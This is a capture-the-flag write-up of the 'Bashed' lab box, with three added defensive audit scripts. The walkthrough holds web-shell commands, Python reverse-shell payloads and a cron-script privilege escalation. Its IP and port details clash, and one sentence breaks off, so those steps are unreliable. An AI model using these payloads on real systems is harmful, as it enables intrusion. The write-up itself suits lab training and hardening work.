
# Bashed

HTB WriteUp by h3xu, posted on Hacking.BG.

# Enumeration

## NMAP
Port 80 is open, running Apache httpd 2.4.18 (Ubuntu); the other 999 scanned ports are closed.


```
# nmap -A 10.10.10.68

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/8%OT=80%CT=1%CU=43586%PV=Y%DS=2%DC=T%G=Y%TM=606EAD62
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   50.56 ms 10.10.14.1
2   50.73 ms 10.10.10.68

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds
```

## Let's see what this website is about

## DirBuster report
It reveals a bunch of interesting directories and files:
 

```
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------

http://10.10.10.68:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/

Dirs found with a 403 response:

/icons/
/icons/small/

--------------------------------
Files found during testing:

Files found with a 200 responce:

/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php

--------------------------------
```

The developer boasts about a phpbash file he created on the platform; phpbash is a single-file web shell, and it is sitting in /dev/ for anyone to reach. Let's use it to get a foothold.

# Burp Suite
I am going to try and see the contents of the discovered files.

## Request
The file runs bash commands on the host as the web server user. Let's cat our flags 🙂

```
POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;
```

## Response
user flag: 2c281f318555dbc1b856957c7147bfc1

```
HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8

/home/arrexel
user.txt
2c281f318555dbc1b856957c7147bfc1
```
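From the defender's side, a phpbash session like the one above leaves a clear trail in the Apache access log: requests to a known web-shell filename, POSTs to a PHP script under a directory that should only hold static content (/dev/, /uploads/), and Apache's PATH_INFO quirk (`/dev/phpbash.min.php/` with a trailing slash still executes phpbash.min.php). The script below is an added example, not code from the original post: it parses combined-format access log lines and flags those three patterns. The log lines are constructed to mirror this box's paths, and the static-directory list and web-shell filename list are assumptions for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample lines in Apache "combined" log format (not taken from the original post).
SAMPLE_LOG = """\
10.10.14.24 - - [08/Apr/2021:03:25:09 -0400] "GET /index.html HTTP/1.1" 200 7743 "-" "Mozilla/5.0"
10.10.14.24 - - [08/Apr/2021:03:25:10 -0400] "GET /css/common.css HTTP/1.1" 200 1201 "http://10.10.10.68/index.html" "Mozilla/5.0"
10.10.14.24 - - [08/Apr/2021:03:30:01 -0400] "GET /dev/phpbash.min.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
10.10.14.24 - - [08/Apr/2021:04:02:27 -0400] "POST /dev/phpbash.min.php/ HTTP/1.1" 200 56 "http://10.10.10.68/dev/phpbash.min.php/" "Mozilla/5.0"
10.10.14.24 - - [08/Apr/2021:04:02:40 -0400] "POST /dev/phpbash.min.php/ HTTP/1.1" 200 913 "http://10.10.10.68/dev/phpbash.min.php/" "Mozilla/5.0"
10.10.14.30 - - [08/Apr/2021:04:05:00 -0400] "POST /php/sendMail.php HTTP/1.1" 200 0 "http://10.10.10.68/single.html" "Mozilla/5.0"
10.10.14.31 - - [08/Apr/2021:04:06:00 -0400] "POST /uploads/avatar.php HTTP/1.1" 200 131 "-" "python-requests/2.25"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Filenames of known interactive web shells (phpbash is the one found on this box); assumed list.
KNOWN_SHELL_NAMES = {"phpbash.php", "phpbash.min.php"}
# Directories that should only serve static content; a POST to a .php file there is suspicious (assumed).
NO_SCRIPT_DIRS = ("/uploads/", "/dev/", "/images/", "/demo-images/")

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the reasons a log entry looks like web-shell use (empty list = nothing notable)."""
    reasons = []
    path = urlsplit(entry["target"]).path
    # Apache PATH_INFO: "/x.php/anything" still executes x.php, so cut the path at ".php".
    script = path.split(".php", 1)[0] + ".php" if ".php" in path else path
    name = script.rsplit("/", 1)[-1]
    if name in KNOWN_SHELL_NAMES:
        reasons.append("known web shell filename")
    if entry["method"] == "POST" and script.endswith(".php") and script.startswith(NO_SCRIPT_DIRS):
        reasons.append("POST to PHP script in a static-content directory")
    if script != path and script.endswith(".php"):
        reasons.append("PATH_INFO appended to a PHP script")
    return reasons

def find_webshell_activity(log_text):
    """Return (ip, method, target, reasons) for every flagged request, in log order."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["method"], entry["target"], reasons))
    return hits

def summarize(hits):
    """Count flagged requests per source IP so the noisiest client surfaces first."""
    return Counter(ip for ip, _, _, _ in hits).most_common()

if __name__ == "__main__":
    hits = find_webshell_activity(SAMPLE_LOG)
    for ip, method, target, reasons in hits:
        print(f"{ip} {method} {target}: {', '.join(reasons)}")
    print(summarize(hits))
```

The PATH_INFO rule is the one worth keeping even if the filename list is useless against a renamed shell: a legitimate site rarely POSTs to `something.php/`, so that pattern alone separates the two phpbash POSTs from the `sendMail.php` form submission.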

 

### Let's see how we can escalate our privileges and gain root

First, get a reverse shell (replace `ATTACKING-IP` and the port with your listener's IP:PORT):

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

 

 

### Let's upgrade our shell, so that we can make it more usable:
1. Spawn a better shell: `python3 -c 'import pty;pty.spawn("/bin/bash")'`
2. Get access to terminal commands: `export TERM=xterm`
3. Background the shell with Ctrl + Z and turn on autocomplete etc. by typing in the original terminal: `stty raw -echo; fg`

 

# Privilege Esc.

* Ran LinEnum.sh locally, but nothing really was of interest.
* Looked for SGID/SUID files.
* Finally, looking into sudoers, I received the following output:

```
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```


 

It seems we (www-data) can run commands as user scriptmanager, since it does not require a password.
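The `sudo -l` entry above is exactly what a host-hardening check should catch: a web-server service account with any sudo rights at all, `NOPASSWD`, and `ALL` commands as another user. The script below is an added example (not from the original post): it parses `sudo -l` output in the format shown and reports the risky properties of each entry. The first sample entry is the one from this box; the second entry and the list of service accounts are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Constructed `sudo -l` output for an Apache account. The first rule is the one from this
# writeup; the second is an invented extra rule so the audit has a contrasting case.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) /usr/sbin/service apache2 restart
"""

HEADER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):$")
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Service accounts that should never appear in sudoers (assumed list): compromising the
# daemon then directly yields sudo rights.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

@dataclass
class SudoEntry:
    user: str          # the account the rule applies to
    host: str
    runas_user: str    # from "(runas_user : runas_group)"; sudo defaults the user to root
    runas_group: str
    tags: list         # e.g. ["NOPASSWD"]
    commands: str      # "ALL" or the allowed command

def parse_sudo_l(text):
    """Parse `sudo -l` output; the Defaults section before the "User ... may run" header is skipped."""
    entries, user, host = [], None, None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            user, host = h["user"], h["host"]
            continue
        if user is None:
            continue
        e = ENTRY_RE.match(line)
        if not e:
            continue
        runas_user, _, runas_group = (part.strip() for part in e["runas"].partition(":"))
        tags = [t.strip() for t in e["tags"].split(":") if t.strip()]
        entries.append(SudoEntry(user, host, runas_user or "root", runas_group, tags, e["cmds"].strip()))
    return entries

def risk_findings(e):
    """Reasons an entry weakens the host's privilege boundary (empty list = nothing notable)."""
    findings = []
    if e.user in SERVICE_ACCOUNTS:
        findings.append(f"service account {e.user} has sudo rights at all")
    if "NOPASSWD" in e.tags:
        findings.append("NOPASSWD: the account's own password is no barrier")
    if e.commands == "ALL":
        findings.append(f"ALL: unrestricted command execution as {e.runas_user}")
    if e.runas_user == "root" and e.commands != "ALL":
        findings.append("runs as root: confirm the allowed command cannot write or execute arbitrary files")
    return findings

def audit(entries):
    """Return (entry, findings) pairs for every entry that has at least one finding."""
    flagged = []
    for e in entries:
        f = risk_findings(e)
        if f:
            flagged.append((e, f))
    return flagged

if __name__ == "__main__":
    for e, f in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{e.user}@{e.host} -> ({e.runas_user}:{e.runas_group}) {e.commands}")
        for reason in f:
            print("   -", reason)
```

Run it against the output of `sudo -l` collected from each host (or feed it the sudoers rules directly after normalising them to this format); on this box the www-data rule trips three of the four checks.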

 

```
$ sudo -u scriptmanager whoami
scriptmanager
```


 

To become user *scriptmanager* we type in:

```
sudo -u scriptmanager bash -i
```


 

Let's enumerate further. What does this user own or have access to?

 

```
scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
```


 

Apart from its own dotfiles, it owns /scripts/test.py.
 

```
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
```


 

It opens test.txt and writes a string into it, hmm. Who owns test.txt?

 

```
scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ../
-rw-r--r--  1 scriptmanager scriptmanager  282 Apr  8 03:19 test.py
-rw-r--r--  1 root          root            12 Apr  8 03:03 test.txt
```

test.txt is owned by root, yet it is written by test.py, which scriptmanager owns. So test.py is being executed as root, presumably by a cron job, and whatever we put into test.py will run as root. Let's add sauce: [python reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 

```
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("change 123!")
# python reverse shell: the IP and port must match the listener you start
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
f.close()
```


 

It writes out the 
### pwn

```
# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
```
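The root cause of this box's privilege escalation is a root cron job executing /scripts/test.py while a non-root user owns the script and its directory. What follows is an added example (not part of the original writeup) of auditing for exactly that: it parses /etc/crontab-style lines, resolves the script paths each root job runs (including a leading `cd DIR &&`), and flags any script or parent directory that is owned by a non-root user or writable by others. The crontab content is an assumption (the box's real crontab is not shown in the writeup), the fake filesystem metadata is constructed to mirror the `ll /scripts` listing above, and the `os.stat` inspector is the default for use on a live host.

```python
import os
import re
import stat
import tempfile
from collections import namedtuple

# Constructed /etc/crontab-style content (system format: m h dom mon dow USER command).
# The Bashed box's real crontab is not shown in the writeup; the first job is an assumption.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/5 *   * * *   root    cd /scripts && python test.py
0  3    * * *   root    /usr/local/bin/backup.sh --full
30 6    * * *   scriptmanager /home/scriptmanager/cleanup.sh
17 *    * * *   root    run-parts --report /etc/cron.hourly
"""

CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
PathInfo = namedtuple("PathInfo", "exists uid gid mode")

def stat_path(path):
    """Default inspector: real filesystem metadata (swap in fake_stat below to audit offline)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return PathInfo(False, None, None, None)
    return PathInfo(True, st.st_uid, st.st_gid, st.st_mode)

def parse_crontab(text):
    """Return (user, command) for every non-comment job line."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m["user"], m["cmd"].strip()))
    return jobs

def script_paths(cmd, cwd="/"):
    """Absolute paths of script-looking tokens in a cron command, honouring a leading `cd DIR &&`."""
    paths = []
    for segment in re.split(r"\s*(?:&&|\|\||;)\s*", cmd):
        tokens = segment.split()
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = tokens[1]
            continue
        for tok in tokens:
            if tok.startswith("-"):
                continue  # an option, not a path
            if "/" in tok or tok.endswith((".py", ".sh", ".pl")):
                paths.append(tok if tok.startswith("/") else os.path.join(cwd, tok))
    return paths

def audit_crontab(text, inspect=stat_path):
    """Flag root jobs whose script, or the script's directory, a non-root user could modify."""
    findings = []
    for user, cmd in parse_crontab(text):
        if user != "root":
            continue
        for path in script_paths(cmd):
            for target in (path, os.path.dirname(path)):
                info = inspect(target)
                if not info.exists:
                    continue
                if info.uid != 0:
                    findings.append((cmd, target, f"owned by uid {info.uid}, not root"))
                if info.mode & stat.S_IWOTH:
                    findings.append((cmd, target, "world-writable"))
                elif info.mode & stat.S_IWGRP and info.gid != 0:
                    findings.append((cmd, target, f"writable by non-root group gid {info.gid}"))
    return findings

# Constructed metadata mirroring the `ll /scripts` listing (uid/gid 1001 stands in for scriptmanager).
FAKE_FS = {
    "/scripts": PathInfo(True, 1001, 1001, stat.S_IFDIR | 0o774),
    "/scripts/test.py": PathInfo(True, 1001, 1001, stat.S_IFREG | 0o644),
    "/usr/local/bin": PathInfo(True, 0, 0, stat.S_IFDIR | 0o755),
    "/usr/local/bin/backup.sh": PathInfo(True, 0, 0, stat.S_IFREG | 0o755),
    "/etc": PathInfo(True, 0, 0, stat.S_IFDIR | 0o755),
    "/etc/cron.hourly": PathInfo(True, 0, 0, stat.S_IFDIR | 0o755),
}

def fake_stat(path):
    return FAKE_FS.get(path, PathInfo(False, None, None, None))

def demo_world_writable():
    """Exercise the real inspector: a root job running a script that anyone can overwrite."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "job.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\necho hi\n")
    os.chmod(script, 0o666)  # deliberately world-writable for the demo
    return audit_crontab(f"0 * * * * root {script}\n")

if __name__ == "__main__":
    for cmd, target, reason in audit_crontab(SAMPLE_CRONTAB, inspect=fake_stat):
        print(f"[{reason}] {target}  (job: {cmd})")
```

Against the constructed layout the only job that produces findings is the one running /scripts/test.py: the script is owned by a non-root user, and its directory is both non-root-owned and group-writable. The directory check matters as much as the file check, because a writable directory lets the owner replace the script even when the file itself is root-owned.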

 
